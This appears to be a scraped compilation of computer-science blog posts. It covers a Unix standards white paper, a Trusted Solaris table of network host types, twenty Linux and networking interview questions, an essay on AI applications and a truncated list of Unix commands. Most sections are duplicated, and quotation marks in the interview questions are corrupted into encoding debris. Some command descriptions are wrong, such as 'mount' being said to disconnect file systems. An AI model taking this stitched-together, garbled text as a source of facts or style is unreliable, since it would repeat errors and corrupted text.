Today, these perceptions are only of historical interest.
Now, a single Graphical User Interface is shipped and supported by all major vendors has replaced command-line syntax, and security systems, up to and including B1, provide appropriate controls over access to the UNIX system.
The Value of Standards
The UNIX system's increasing popularity spawned the development of a number of variations of the UNIX operating system in the 1980s, and the existence of these caused a mid-life crisis. Standardization had progressed slowly and methodically in domains such as telecommunications and third-generation languages; yet no one had addressed standards at the operating system level. For suppliers, the thought of a uniform operating environment was disconcerting. Consumer lock-in was woven tightly into the fabric of the industry. Individual consumers, particularly those with UNIX system experience, envisioned standardized environments, but had no way to pull the market in their direction.
However, for one category of consumer -governments- the standardization of the UNIX system was both desirable and within reach. Governments have clout and are the largest consumers of information technology products and services in the world. Driven by the need to improve commonality, both US and European governments endorsed a shift to the UNIX system. The Institute of Electrical and Electronic Engineers POSIX family of standards, along with standards from ISO, ANSI and others, led the way. Consortia such as the X/Open Company (merged with the Open Software Foundation in 1995 to form The Open Group) hammered out draft standards to accelerate the process.
In 1994, the definitive specification of what constitutes a UNIX system was finalized through X/Open Company's consensus process. The Single UNIX Specification was born-not from a theoretical, ivory tower approach, but by analyzing the applications that were in use in businesses across the world.
With the active support of government and commercial buyers alike, vendors began to converge on products that implement the Single UNIX Specification, and now all major vendors have products labeled UNIX 95, which indicates that the vendor guarantees that the product conforms to the Single UNIX Specification.
Vendors continue to add value to the UNIX system, particularly in areas of new technology, however that value will always be built upon a single, consensus standard. Meanwhile, the functionality of the UNIX system was established and the mid-life crisis was resolved. Suppliers today provide UNIX systems that are built upon a single, consensus standard.
It is also important to remember that even when variance among UNIX systems was at its worst, IT professionals agreed that migration among UNIX system variants was far easier than migration among the proprietary alternatives.
Now with UNIX 95 branded products available from all major systems vendors, the buyer can for the first time buy systems from different manufacturers, safe in the knowledge that each one is guaranteed to implement the complete functionality of the Single UNIX Specification and will continue to do so.
UNIX system suppliers can assure customers that they own a standards-based system by registering them to use the Open Brand. Below is a list of suppliers who give users this guarantee.
computer science the complete reference
computer security at a glance
Is it possible for an Information Technology [IT] product to be both mature and state-of-the-art at the same time? In the case of the UNIX® system, the answer is an unqualified "Yes." The UNIX system has continued to develop over the past twenty-five years. In millions of installations running on nearly every hardware platform made, the UNIX system has earned its reputation for stability and scalability. Over the years, UNIX system suppliers have steadily assimilated new technologies so that UNIX systems today provide more functionality as any other operating system.
Perhaps the key to the continuing growth of the UNIX system is the free-market demands placed upon suppliers who produce and support software built to open standards. The "open systems" approach is in bold contrast to other operating environments that lock in their customers with resultant high switching costs. UNIX system suppliers, on the other hand, must constantly provide the highest quality systems in order to retain their customers. Those who become dissatisfied with one UNIX system implementation retain the ability to easily move to another UNIX system implementation.
The continuing success of the UNIX system should come as no surprise. No other operating environment enjoys the support of every major system supplier. Mention the UNIX system and IT professionals immediately think not only of the operating system itself, but also of the large family of application software that the UNIX system supports. In the IT marketplace, the UNIX system has been the catalyst for sweeping changes that have empowered consumers to seek the best-of-breed without the arbitrary constraints imposed by proprietary environments.
In a nutshell then, the UNIX system is the users' and suppliers' operating environment of choice. The UNIX system represents the best collective efforts of competing suppliers, the most refined standards in the public domain, and the rock-solid stability that comes from years of quality assurance testing, mission-critical use, and refinement.
This white paper examines the UNIX system with a special concern for both its extraordinary past and its equally extraordinary prospects for the future.
The UNIX System
The UNIX system has been around for a long time, and many people may remember it as it existed in the previous decades. Many IT professionals who encountered UNIX systems in the past found it uncompromising. While its power was impressive, its command-line interface required technical competence, its syntax was not intuitive, and its interface was unfriendly.
Moreover, in the UNIX system's early days, security was virtually nonexistent. Subsequently, the UNIX system became the first operating system to suffer attacks mounted over the nascent Internet. As the UNIX system matured, however, the organization of security shifted from centralized to distributed authentication and authorization systems.
Today, these perceptions are only of historical interest.
Now, a single Graphical User Interface is shipped and supported by all major vendors has replaced command-line syntax, and security systems, up to and including B1, provide appropriate controls over access to the UNIX system.
The Value of Standards
The UNIX system's increasing popularity spawned the development of a number of variations of the UNIX operating system in the 1980s, and the existence of these caused a mid-life crisis. Standardization had progressed slowly and methodically in domains such as telecommunications and third-generation languages; yet no one had addressed standards at the operating system level. For suppliers, the thought of a uniform operating environment was disconcerting. Consumer lock-in was woven tightly into the fabric of the industry. Individual consumers, particularly those with UNIX system experience, envisioned standardized environments, but had no way to pull the market in their direction.
However, for one category of consumer -governments- the standardization of the UNIX system was both desirable and within reach. Governments have clout and are the largest consumers of information technology products and services in the world. Driven by the need to improve commonality, both US and European governments endorsed a shift to the UNIX system. The Institute of Electrical and Electronic Engineers POSIX family of standards, along with standards from ISO, ANSI and others, led the way. Consortia such as the X/Open Company (merged with the Open Software Foundation in 1995 to form The Open Group) hammered out draft standards to accelerate the process.
In 1994, the definitive specification of what constitutes a UNIX system was finalized through X/Open Company's consensus process. The Single UNIX Specification was born-not from a theoretical, ivory tower approach, but by analyzing the applications that were in use in businesses across the world.
With the active support of government and commercial buyers alike, vendors began to converge on products that implement the Single UNIX Specification, and now all major vendors have products labeled UNIX 95, which indicates that the vendor guarantees that the product conforms to the Single UNIX Specification.
Vendors continue to add value to the UNIX system, particularly in areas of new technology, however that value will always be built upon a single, consensus standard. Meanwhile, the functionality of the UNIX system was established and the mid-life crisis was resolved. Suppliers today provide UNIX systems that are built upon a single, consensus standard.
It is also important to remember that even when variance among UNIX systems was at its worst, IT professionals agreed that migration among UNIX system variants was far easier than migration among the proprietary alternatives.
Now with UNIX 95 branded products available from all major systems vendors, the buyer can for the first time buy systems from different manufacturers, safe in the knowledge that each one is guaranteed to implement the complete functionality of the Single UNIX Specification and will continue to do so.
UNIX system suppliers can assure customers that they own a standards-based system by registering them to use the Open Brand. Below is a list of suppliers who give users this guarantee.
computer science the complete reference
computer security at a glance
computer host types
Host Types
The following table describes the host types for which entries can be made in the trusted network databases. The first column shows the name used in the Security Families host type menu.
Table 7-1 Host Types, Protocols, and Notes
Name in Template Manager
Protocols and Notes
Trusted Solaris
The TSOL protocol simplifies passing security attributes between computers running Trusted Solaris 2.5.1, Trusted Solaris 7, Trusted Solaris 8, or Trusted Solaris 8 4/01 releases. TSOL is a derivative of the TSIX(RE) 1.1 - SAMP protocol that passes the security attributes in a similar place in the network protocol stack and uses similar header structures. The TSOL protocol passes security attributes in binary form and thus does not require token mapping. NOTE: For communications between Trusted Solaris computers, either the Trusted Solaris or TSIX host type can be assigned in the templates, depending on whether you want the labels to be transmitted in binary form or in token form. If only the labels' names differ on two computers while the labels' binary representations are the same, the Trusted Solaris host type can be used. If the labels' names are the same but the labels' binary representations are different on both Trusted Solaris computers, the TSIX host type can be assigned.
Unlabeled
This host type is assigned to computers running Solaris or other unlabeled operating environments to specify a default label and default clearance to apply to communications with the unlabeled computer. Also, a minimum and maximum label can be set to allow the sending of packets to an unlabeled gateway for forwarding when the packets' labels do not match the default label and would therefore not be sent to the computer as a destination.
RIPSO
Revised IP Security Option (RIPSO) described in the IETF RFC 1108. It specifies a DoD IP labeling method to incorporate labels into IP packets, which are then used for network mandatory access control checks. A fixed RIPSO label specified in the template is applied to network packets interchanged with the particular host. Though this functionality does not fully meet the RFC specifications, it is expected to supply sufficient functionality where RIPSO labels are needed.
CIPSO
Common IP Security Option (CIPSO) protocol TSIX(RE) 1.1 is used to specify security labels that are passed in the IP options field. CIPSO labels are derived automatically from the data's label. Tag type 1 is used to pass the CIPSO security label. This label is then used to make security checks at the IP level and to label the data in the network packet.
TSIX
Trusted Security Information Exchange for Restricted Environments (TSIX/RE) protocol uses token mapping to pass security attributes. Can be used for computers running the Trusted Solaris or other TSIX-cognizant operating environments. See the NOTE for the Trusted Solaris host type in the first entry in this table.
computer science reference
The following table describes the host types for which entries can be made in the trusted network databases. The first column shows the name used in the Security Families host type menu.
Table 7-1 Host Types, Protocols, and Notes
Name in Template Manager
Protocols and Notes
Trusted Solaris
The TSOL protocol simplifies passing security attributes between computers running Trusted Solaris 2.5.1, Trusted Solaris 7, Trusted Solaris 8, or Trusted Solaris 8 4/01 releases. TSOL is a derivative of the TSIX(RE) 1.1 - SAMP protocol that passes the security attributes in a similar place in the network protocol stack and uses similar header structures. The TSOL protocol passes security attributes in binary form and thus does not require token mapping. NOTE: For communications between Trusted Solaris computers, either the Trusted Solaris or TSIX host type can be assigned in the templates, depending on whether you want the labels to be transmitted in binary form or in token form. If only the labels' names differ on two computers while the labels' binary representations are the same, the Trusted Solaris host type can be used. If the labels' names are the same but the labels' binary representations are different on both Trusted Solaris computers, the TSIX host type can be assigned.
Unlabeled
This host type is assigned to computers running Solaris or other unlabeled operating environments to specify a default label and default clearance to apply to communications with the unlabeled computer. Also, a minimum and maximum label can be set to allow the sending of packets to an unlabeled gateway for forwarding when the packets' labels do not match the default label and would therefore not be sent to the computer as a destination.
RIPSO
Revised IP Security Option (RIPSO) described in the IETF RFC 1108. It specifies a DoD IP labeling method to incorporate labels into IP packets, which are then used for network mandatory access control checks. A fixed RIPSO label specified in the template is applied to network packets interchanged with the particular host. Though this functionality does not fully meet the RFC specifications, it is expected to supply sufficient functionality where RIPSO labels are needed.
CIPSO
Common IP Security Option (CIPSO) protocol TSIX(RE) 1.1 is used to specify security labels that are passed in the IP options field. CIPSO labels are derived automatically from the data's label. Tag type 1 is used to pass the CIPSO security label. This label is then used to make security checks at the IP level and to label the data in the network packet.
TSIX
Trusted Security Information Exchange for Restricted Environments (TSIX/RE) protocol uses token mapping to pass security attributes. Can be used for computers running the Trusted Solaris or other TSIX-cognizant operating environments. See the NOTE for the Trusted Solaris host type in the first entry in this table.
computer science reference
linux interview question
INTERVIEW QUESTION ON LINUX
A pretty funny story - someone was offered a test of basic Linux questions for a junior network administrator position, and figured out that the best way to impress the future employer with good answers is to post the list on UbuntuForums. Good idea, right? That’s where all the Linux experts hang out. Unfortunately, that’s where the employer hung out as well:
It didn’t seem to me that I was asking too much for people to use mailing lists, forums, IRC whatever to compile the answers themselves. I actually expected to see some questions show up on forums but I didn’t expect someone to paste the entire thing and expect the forum users to do all the work that would qualify you for an interview. I think at this point you could save us all some time and not turn the answers back in, I already have the information I need on your answers.
Anyway, the list has been made public, so enjoy:
1. Give an example of set of shell commands that will give you the number of files in a directory
2. How do you tell what process has a TCP port open in Linux
3. On a Red Hat Linux Variant how do you control whether a service starts when the system boots
4. How do you tell the amount of free disk space left on a volume
5. Give an example of a set of shell commands to tell how many times Ć¢Ć¢‚¬Ć “bobĆ¢Ć¢‚¬Ć has logged on to the system this month
6. Give an example of a recursively copying a directory from one location to another.
7. How do you modify the IP and Net mask of a system running a Red Hat Variant of Linux
8. Give an example of a set of shell commands that will give you the number of Ć¢Ć¢‚¬Ć “httpdĆ¢Ć¢‚¬Ć processes running on a Linux box.
9. On CentOS or Fedora based system using the package management application, how do you tell what package provided the file Ć¢Ć¢‚¬Ć “libnss_ldap.soĆ¢Ć¢‚¬Ć
10. What is the difference between VTP client, server, and transparent
11. What is the maximum length of CAT6
12. How does one set up a layer two link to share VLANs
13. How does one implement redundant links at Layer 2
14. What is the difference between a hub, switch, and a router? What are the security advantages of switch vs. hub?
15. Show an example of using telnet to learn the headers of an http server.
16. In what OSI layer does PPP exist
17. What’s the difference between TCP and UDP
18. Given a DNS server that has just started (with an empty cache) and host contacting this DNS server (using it’s OS setting) to learn an address for google.com, list the steps the DNS server will take to learn it with IP addresses (each step will have multiple possible IP addresses Ć¢Ć¢‚¬Ć¢€Å you need choose only one per step).
19. Why are layer 2 loops bad, and what protocol was designed to prevent them
20. Given a radius server at 10.0.0.2 and a shared key of Ć¢Ć¢‚¬ĆÅabc123′ show the IOS commands necessary to authenticate switch users against the radius server, while still allowing the use of local username / password pairs
COMPUTER SCIENCE
A pretty funny story - someone was offered a test of basic Linux questions for a junior network administrator position, and figured out that the best way to impress the future employer with good answers is to post the list on UbuntuForums. Good idea, right? That’s where all the Linux experts hang out. Unfortunately, that’s where the employer hung out as well:
It didn’t seem to me that I was asking too much for people to use mailing lists, forums, IRC whatever to compile the answers themselves. I actually expected to see some questions show up on forums but I didn’t expect someone to paste the entire thing and expect the forum users to do all the work that would qualify you for an interview. I think at this point you could save us all some time and not turn the answers back in, I already have the information I need on your answers.
Anyway, the list has been made public, so enjoy:
1. Give an example of set of shell commands that will give you the number of files in a directory
2. How do you tell what process has a TCP port open in Linux
3. On a Red Hat Linux Variant how do you control whether a service starts when the system boots
4. How do you tell the amount of free disk space left on a volume
5. Give an example of a set of shell commands to tell how many times Ć¢Ć¢‚¬Ć “bobĆ¢Ć¢‚¬Ć has logged on to the system this month
6. Give an example of a recursively copying a directory from one location to another.
7. How do you modify the IP and Net mask of a system running a Red Hat Variant of Linux
8. Give an example of a set of shell commands that will give you the number of Ć¢Ć¢‚¬Ć “httpdĆ¢Ć¢‚¬Ć processes running on a Linux box.
9. On CentOS or Fedora based system using the package management application, how do you tell what package provided the file Ć¢Ć¢‚¬Ć “libnss_ldap.soĆ¢Ć¢‚¬Ć
10. What is the difference between VTP client, server, and transparent
11. What is the maximum length of CAT6
12. How does one set up a layer two link to share VLANs
13. How does one implement redundant links at Layer 2
14. What is the difference between a hub, switch, and a router? What are the security advantages of switch vs. hub?
15. Show an example of using telnet to learn the headers of an http server.
16. In what OSI layer does PPP exist
17. What’s the difference between TCP and UDP
18. Given a DNS server that has just started (with an empty cache) and host contacting this DNS server (using it’s OS setting) to learn an address for google.com, list the steps the DNS server will take to learn it with IP addresses (each step will have multiple possible IP addresses Ć¢Ć¢‚¬Ć¢€Å you need choose only one per step).
19. Why are layer 2 loops bad, and what protocol was designed to prevent them
20. Given a radius server at 10.0.0.2 and a shared key of Ć¢Ć¢‚¬ĆÅabc123′ show the IOS commands necessary to authenticate switch users against the radius server, while still allowing the use of local username / password pairs
COMPUTER SCIENCE
A.I application
Applications of AI
computer science complete reference
Artificial Intelligence in the form of expert systems and neural networks have applications in every field of human endeavor. They combine precision and computational power with pure logic, to solve problems and reduce error in operation. Already, robot expert systems are taking over many jobs in industries that are dangerous for or beyond human ability. Some of the applications divided by domains are as follows:
Heavy Industries and Space: Robotics and cybernetics have taken a leap combined with artificially intelligent expert systems. An entire manufacturing process is now totally automated, controlled and maintained by a computer system in car manufacture, machine tool production, computer chip production and almost every high-tech process. They carry out dangerous tasks like handling hazardous radioactive materials. Robotic pilots carry out complex maneuvering techniques of unmanned spacecrafts sent in space. Japan is the leading country in the world in terms of robotics research and use.
Finance: Banks use intelligent software applications to screen and analyze financial data. Softwares that can predict trends in the stock market have been created which have been known to beat humans in predictive power.
Computer Science: Researchers in quest of artificial intelligence have created spin offs like dynamic programming, object oriented programming, symbolic programming, intelligent storage management systems and many more such tools. The primary goal of creating an artificial intelligence still remains a distant dream but people are getting an idea of the ultimate path which could lead to it.
Aviation: Air lines use expert systems in planes to monitor atmospheric conditions and system status. The plane can be put on auto pilot once a course is set for the destination.
expert system
Weather Forecast: Neural networks are used for predicting weather conditions. Previous data is fed to a neural network which learns the pattern and uses that knowledge to predict weather patterns.
Swarm Intelligence: This is an approach to, as well as application of artificial intelligence similar to a neural network. Here, programmers study how intelligence emerges in natural systems like swarms of bees even though on an individual level, a bee just follows simple rules. They study relationships in nature like the prey-predator relationships that give an insight into how intelligence emerges in a swarm or collection from simple rules at an individual level. They develop intelligent systems by creating agent programs that mimic the behavior of these natural systems!
Is artificial Intelligence really possible? Can an intelligence like a human mind surpass itself and create its own image? The depth and the powers of the human mind are just being tapped. Who knows, it might be possible, only time can tell! Even if such an intelligence is created, will it share our sense of morals and justice, will it share our idiosyncrasies? This will be the next step in the evolution of intelligence. Hope I have succeeded in conveying to you the excitement and possibilities this subject holds!
Applications of AI
Q. What are the applications of AI?
A. Here are some.
game playing
You can buy machines that can play master level chess for a few hundred dollars. There is some AI in them, but they play well against people mainly through brute force computation--looking at hundreds of thousands of positions. To beat a world champion by brute force and known reliable heuristics requires being able to look at 200 million positions per second.
speech recognition
In the 1990s, computer speech recognition reached a practical level for limited purposes. Thus United Airlines has replaced its keyboard tree for flight information by a system using speech recognition of flight numbers and city names. It is quite convenient. On the the other hand, while it is possible to instruct some computers using speech, most users have gone back to the keyboard and the mouse as still more convenient.
understanding natural language
Just getting a sequence of words into a computer is not enough. Parsing sentences is not enough either. The computer has to be provided with an understanding of the domain the text is about, and this is presently possible only for very limited domains.
computer vision
The world is composed of three-dimensional objects, but the inputs to the human eye and computers' TV cameras are two dimensional. Some useful programs can work solely in two dimensions, but full computer vision requires partial three-dimensional information that is not just a set of two-dimensional views. At present there are only limited ways of representing three-dimensional information directly, and they are not as good as what humans evidently use.
expert systems
A ``knowledge engineer'' interviews experts in a certain domain and tries to embody their knowledge in a computer program for carrying out some task. How well this works depends on whether the intellectual mechanisms required for the task are within the present state of AI. When this turned out not to be so, there were many disappointing results. One of the first expert systems was MYCIN in 1974, which diagnosed bacterial infections of the blood and suggested treatments. It did better than medical students or practicing doctors, provided its limitations were observed. Namely, its ontology included bacteria, symptoms, and treatments and did not include patients, doctors, hospitals, death, recovery, and events occurring in time. Its interactions depended on a single patient being considered. Since the experts consulted by the knowledge engineers knew about patients, doctors, death, recovery, etc., it is clear that the knowledge engineers forced what the experts told them into a predetermined framework. In the present state of AI, this has to be true. The usefulness of current expert systems depends on their users having common sense.
heuristic classification
One of the most feasible kinds of expert system given the present knowledge of AI is to put some information in one of a fixed set of categories using several sources of information. An example is advising whether to accept a proposed credit card purchase. Information is available about the owner of the credit card, his record of payment and also about the item he is buying and about the establishment from which he is buying it (e.g., about whether there have been previous credit card frauds at this establishment).
computer science complete reference
Artificial Intelligence in the form of expert systems and neural networks have applications in every field of human endeavor. They combine precision and computational power with pure logic, to solve problems and reduce error in operation. Already, robot expert systems are taking over many jobs in industries that are dangerous for or beyond human ability. Some of the applications divided by domains are as follows:
Heavy Industries and Space: Robotics and cybernetics have taken a leap combined with artificially intelligent expert systems. An entire manufacturing process is now totally automated, controlled and maintained by a computer system in car manufacture, machine tool production, computer chip production and almost every high-tech process. They carry out dangerous tasks like handling hazardous radioactive materials. Robotic pilots carry out complex maneuvering techniques of unmanned spacecrafts sent in space. Japan is the leading country in the world in terms of robotics research and use.
Finance: Banks use intelligent software applications to screen and analyze financial data. Softwares that can predict trends in the stock market have been created which have been known to beat humans in predictive power.
Computer Science: Researchers in quest of artificial intelligence have created spin offs like dynamic programming, object oriented programming, symbolic programming, intelligent storage management systems and many more such tools. The primary goal of creating an artificial intelligence still remains a distant dream but people are getting an idea of the ultimate path which could lead to it.
Aviation: Air lines use expert systems in planes to monitor atmospheric conditions and system status. The plane can be put on auto pilot once a course is set for the destination.
expert system
Weather Forecast: Neural networks are used for predicting weather conditions. Previous data is fed to a neural network which learns the pattern and uses that knowledge to predict weather patterns.
Swarm Intelligence: This is an approach to, as well as application of artificial intelligence similar to a neural network. Here, programmers study how intelligence emerges in natural systems like swarms of bees even though on an individual level, a bee just follows simple rules. They study relationships in nature like the prey-predator relationships that give an insight into how intelligence emerges in a swarm or collection from simple rules at an individual level. They develop intelligent systems by creating agent programs that mimic the behavior of these natural systems!
Is artificial Intelligence really possible? Can an intelligence like a human mind surpass itself and create its own image? The depth and the powers of the human mind are just being tapped. Who knows, it might be possible, only time can tell! Even if such an intelligence is created, will it share our sense of morals and justice, will it share our idiosyncrasies? This will be the next step in the evolution of intelligence. Hope I have succeeded in conveying to you the excitement and possibilities this subject holds!
Applications of AI
Q. What are the applications of AI?
A. Here are some.
game playing
You can buy machines that can play master level chess for a few hundred dollars. There is some AI in them, but they play well against people mainly through brute force computation--looking at hundreds of thousands of positions. To beat a world champion by brute force and known reliable heuristics requires being able to look at 200 million positions per second.
speech recognition
In the 1990s, computer speech recognition reached a practical level for limited purposes. Thus United Airlines has replaced its keyboard tree for flight information by a system using speech recognition of flight numbers and city names. It is quite convenient. On the the other hand, while it is possible to instruct some computers using speech, most users have gone back to the keyboard and the mouse as still more convenient.
understanding natural language
Just getting a sequence of words into a computer is not enough. Parsing sentences is not enough either. The computer has to be provided with an understanding of the domain the text is about, and this is presently possible only for very limited domains.
computer vision
The world is composed of three-dimensional objects, but the inputs to the human eye and computers' TV cameras are two dimensional. Some useful programs can work solely in two dimensions, but full computer vision requires partial three-dimensional information that is not just a set of two-dimensional views. At present there are only limited ways of representing three-dimensional information directly, and they are not as good as what humans evidently use.
expert systems
A ``knowledge engineer'' interviews experts in a certain domain and tries to embody their knowledge in a computer program for carrying out some task. How well this works depends on whether the intellectual mechanisms required for the task are within the present state of AI. When this turned out not to be so, there were many disappointing results. One of the first expert systems was MYCIN in 1974, which diagnosed bacterial infections of the blood and suggested treatments. It did better than medical students or practicing doctors, provided its limitations were observed. Namely, its ontology included bacteria, symptoms, and treatments and did not include patients, doctors, hospitals, death, recovery, and events occurring in time. Its interactions depended on a single patient being considered. Since the experts consulted by the knowledge engineers knew about patients, doctors, death, recovery, etc., it is clear that the knowledge engineers forced what the experts told them into a predetermined framework. In the present state of AI, this has to be true. The usefulness of current expert systems depends on their users having common sense.
heuristic classification
One of the most feasible kinds of expert system given the present knowledge of AI is to put some information in one of a fixed set of categories using several sources of information. An example is advising whether to accept a proposed credit card purchase. Information is available about the owner of the credit card, his record of payment and also about the item he is buying and about the establishment from which he is buying it (e.g., about whether there have been previous credit card frauds at this establishment).
linux & unix tutorial
Brief overview of Unix / Linux commands
Below is a listing of each of the Unix / Linux commands currently listed on Computer Hope and a brief explanation of what each of the commands do. This is a full listing which means not all the below commands will work with your distribution and may also not work because of your privileges. Clicking on any of the commands will display additional help and information about that command.
Command Description
a2p Creates a Perl script from an awk script.
ac Prints statistics about users’ connect time.
alias Create a name for another command or long command string.
ar Maintain portable archive or library.
arch Display the architecture of the current host.
arp Manipulate the system ARP cache.
as An assembler.
at Command scheduler.
awk Awk script processing program.
basename Deletes any specified prefix from a string.
bash Command Bourne interpreter
bc Calculator.
bdiff Compare large files.
bfs Editor for large files.
bg Continues a program running in the background.
biff Enable / disable incoming mail notifications.
break Break out of while, for, foreach, or until loop.
bs Battleship game.
bye Alias often used for the exit command.
cal Calendar
calendar Display appointments and reminders.
cancel Cancels a print job.
cat View and/or modify a file.
cc C compiler.
cd Change directory.
chdir Change directory.
checkeq Language processors to assist in describing equations.
checknr Check nroff and troff files for any errors.
chfn Modify your own information or if super user or root modify another users information.
chgrp Change a groups access to a file or directory.
chkey Change the secure RPC key pair.
chmod Change the permission of a file.
chown Change the ownership of a file.
chsh Change login shell.
cksum Display and calculate a CRC for files.
clear Clears screen.
cls Alias often used to clear a screen.
cmp Compare files.
col Reverse line-feeds filter.
comm Compare files and select or reject lines that are common.
compress Compress files on a computer.
continue Break out of while, for, foreach, or until loop.
copy Copy files.
cp Copy files.
cpio Creates archived CPIO files.
crontab Create and list files that you wish to run on a regular schedule.
csh Execute the C shell command interpreter
csplit Split files based on context.
ctags Create a tag file for use with ex and vi.
cu Calls or connects to another Unix system, terminal or non-Unix system.
curl Transfer a URL.
cut Cut out selected fields of each line of a file.
date Tells you the date and time in Unix.
dc An arbitrary precision arithmetic package.
df Display the available disk space for each mount.
deroff Removes nroff/troff, tbl, and eqn constructs.
dhclient Dynamic Host Configuration Protocol Client.
diff Displays two files and prints the lines that are different.
dig DNS lookup utility.
dircmp Lists the different files when comparing directories.
dirname Deliver portions of path names.
dmesg Print or control the kernel ring buffer.
dos2unix Converts text files between DOS and Unix formats.
dpost Translates files created by troff into PostScript.
du Tells you how much space a file occupies.
echo Displays text after echo to the terminal.
ed Line oriented file editor.
edit Text editor.
egrep Search a file for a pattern using full regular expressions.
elm Program command used to send and receive e-mail.
emacs Text editor.
enable Enables / Disables LP printers.
env Displays environment variables.
eqn Language processors to assist in describing equations.
ex Line-editor mode of the vi text editor.
exit Exit from a program, shell or log you out of a Unix network.
expand Expand copies of file s.
expr Evaluate arguments as an expression.
fc The FC utility lists or edits and re-executes, commands previously entered to an interactive sh.
fg Continues a stopped job by running it in the foreground
fgrep Search a file for a fixed-character string.
file Tells you if the object you are looking at is a file or if it is a directory.
find Finds one or more files assuming that you know their approximate filenames.
findsmb List info about machines that respond to SMB name queries on a subnet.
finger Lists information about the user.
fmt Simple text formatters.
fold Filter for folding lines.
for Shell built-in functions to repeatedly execute action(s) for a selected number of times.
foreach Shell built-in functions to repeatedly execute action(s) for a selected number of times.
fromdos Converts text files between DOS and Unix formats.
fsck Check and repair a Linux file system.
ftp Enables ftp access to another terminal.
getfacl Display discretionary file information.
gprof The gprof utility produces an execution profile of a program.
grep Finds text within a file.
groupadd Creates a new group account.
groupdel Enables a super user or root to remove a group.
groupmod Enables a super user or root to modify a group.
gunzip Expand compressed files.
gview A programmers text editor.
gvim A programmers text editor.
gzip Compress files.
halt Stop the computer.
hash Remove internal hash table.
hashstat Display the hash stats.
head Displays the first ten lines of a file, unless otherwise stated.
help If computer has online help documentation installed this command will display it.
history Display the history of commands typed.
host DNS lookup utility.
hostid Prints the numeric identifier for the current host.
hostname Set or print name of current host system.
id Shows you the numeric user and group ID on BSD.
ifconfig Sets up network interfaces.
ifdown take a network interface down
ifup bring a network interface up
isalist Display the native instruction sets executable on this platform.
jobs List the jobs currently running in the background.
join Joins command forms together.
keylogin Decrypt the user’s secret key.
kill Cancels a job.
ksh Korn shell command interpreter.
ld Link-editor for object files.
ldd List dynamic dependencies of executable files or shared objects.
less Opposite of the more command.
lex Generate programs for lexical tasks.
link Calls the link function to create a link to a file.
ln Creates a link to a file.
lo Allows you to exit from a program, shell or log you out of a Unix network.
locate List files in databases that match a pattern.
login Signs into a new system.
logname Returns users login name.
logout Logs out of a system.
lp Prints a file on System V systems.
lpadmin Configure the LP print service.
lpc Line printer control program.
lpq Lists the status of all the available printers.
lpr Submits print requests.
lprm Removes print requests from the print queue.
lpstat Lists status of the LP print services.
ls Lists the contents of a directory.
mach Display the processor type of the current host.
mail One of the ways that allows you to read/send E-Mail.
mailcompat Provide SunOS 4.x compatibility for the Solaris mailbox format.
mailx Mail interactive message processing system.
make Executes a list of shell commands associated with each target.
man Display a manual of a command.
mesg Control if non-root users can send text messages to you.
mii-tool View, manipulate media-independent interface status.
mkdir Create a directory.
mkfs Build a Linux file system, usually a hard disk partition.
more Displays text one screen at a time.
mount Disconnects a file systems and remote resources.
mt Magnetic tape control.
mv Renames a file or moves it from one directory to another directory.
nc TCP/IP swiss army knife.
neqn Language processors to assist in describing equations.
netstat Shows network status.
newalias Install new elm aliases for user and/or system.
newform Change the format of a text file.
newgrp Log into a new group.
nice Invokes a command with an altered scheduling priority.
niscat Display NIS+ tables and objects.
nischmod Change access rights on a NIS+ object.
nischown Change the owner of a NIS+ object.
nischttl Change the time to live value of a NIS+ object.
nisdefaults Display NIS+ default values.
nisgrep Utilities for searching NIS+ tables.
nismatch Utilities for searching NIS+ tables.
nispasswd Change NIS+ password information.
nistbladm NIS+ table administration command.
nmap Network exploration tool and security / port scanner.
nohup Runs a command even if the session is disconnected or the user logs out.
nroff Formats documents for display or line-printer.
nslookup Queries a name server for a host or domain lookup.
on Execute a command on a remote system, but with the local environment.
onintr Shell built-in functions to respond to (hardware) signals.
optisa Determine which variant instruction set is optimal to use.
pack Shrinks file into a compressed file.
pagesize Display the size of a page of memory in bytes, as returned by getpagesize.
passwd Allows you to change your password.
paste Merge corresponding or subsequent lines of files.
pax Read / write and writes lists of the members of archive files and copy directory hierarchies.
pcat Compresses file.
perl Perl is a programming language optimized for scanning arbitrary text files, extracting information from those text files.
pg Files perusal filters for CRTs.
pgrep Examine the active processes on the system and reports the process IDs of the processes
pico Simple and very easy to use text editor in the style of the Pine Composer.
pine Command line program for Internet News and Email.
ping Sends ICMP ECHO_REQUEST packets to network hosts.
pkill Examine the active processes on the system and reports the process IDs of the processes
poweroff Stop the computer.
pr Formats a file to make it look better when printed.
priocntl Display’s or set scheduling parameters of specified process(es)
printf Write formatted output.
ps Reports the process status.
pvs Display the internal version information of dynamic objects within an ELF file.
pwd Print the current working directory.
quit Allows you to exit from a program, shell or log you out of a Unix network.
rcp Copies files from one computer to another computer.
reboot Stop the computer.
red Line oriented file editor.
rehash Recomputes the internal hash table of the contents of directories listed in the path.
remsh Runs a command on another computer.
repeat Shell built-in functions to repeatedly execute action(s) for a selected number of times.
rgview A programmers text editor.
rgvim A programmers text editor.
rlogin Establish a remote connection from your terminal to a remote machine.
rm Deletes a file without confirmation (by default).
rmail One of the ways that allows you to read/send E-Mail.
rmdir Deletes a directory.
rn Reads newsgroups.
route Show / manipulate the IP routing table.
rpcinfo Report RPC information.
rsh Runs a command on another computer.
rsync Faster, flexible replacement for rcp.
rview A programmers text editor.
rvim A programmers text editor.
s2p Convert a sed script into a Perl script.
sag Graphically displays the system activity data stored in a binary data file by a previous sar run.
sar Displays the activity for the CPU.
script Records everything printed on your screen.
sdiff Compares two files, side-by-side.
sed Allows you to use pre-recorded commands to make changes to text.
sendmail Sends mail over the Internet.
set Set the value of an environment variable.
setenv Set the value of an environment variable.
setfacl Modify the Access Control List (ACL) for a file or files.
settime Change file access and modification time.
sftp Secure file transfer program.
sh Runs or processes jobs through the Bourne shell.
shred Delete a file securely, first overwriting it to hide its contents.
shutdown Turn off the computer immediately or at a specified time.
sleep Waits a x amount of seconds.
slogin OpenSSH SSH client (remote login program).
smbclient An ftp-like client to access SMB/CIFS resources on servers.
sort Sorts the lines in a text file.
spell Looks through a text file and reports any words that it finds in the text file that are not in the dictionary.
split Split a file into pieces.
stat Display file or filesystem status.
stop Control process execution.
strip Discard symbols from object files.
stty Sets options for your terminal.
su Become super user or another user.
sysinfo Get and set system information strings.
sysklogd Linux system logging utilities.
tabs Set tabs on a terminal.
tail Delivers the last part of the file.
talk Talk with other logged in users.
tac Concatenate and print files in reverse.
tar Create tape archives and add or extract files.
tbl Preprocessor for formatting tables for nroff or troff.
tcopy Copy a magnetic tape.
tcpdump Dump traffic on a network.
tee Read from an input and write to a standard output or file.
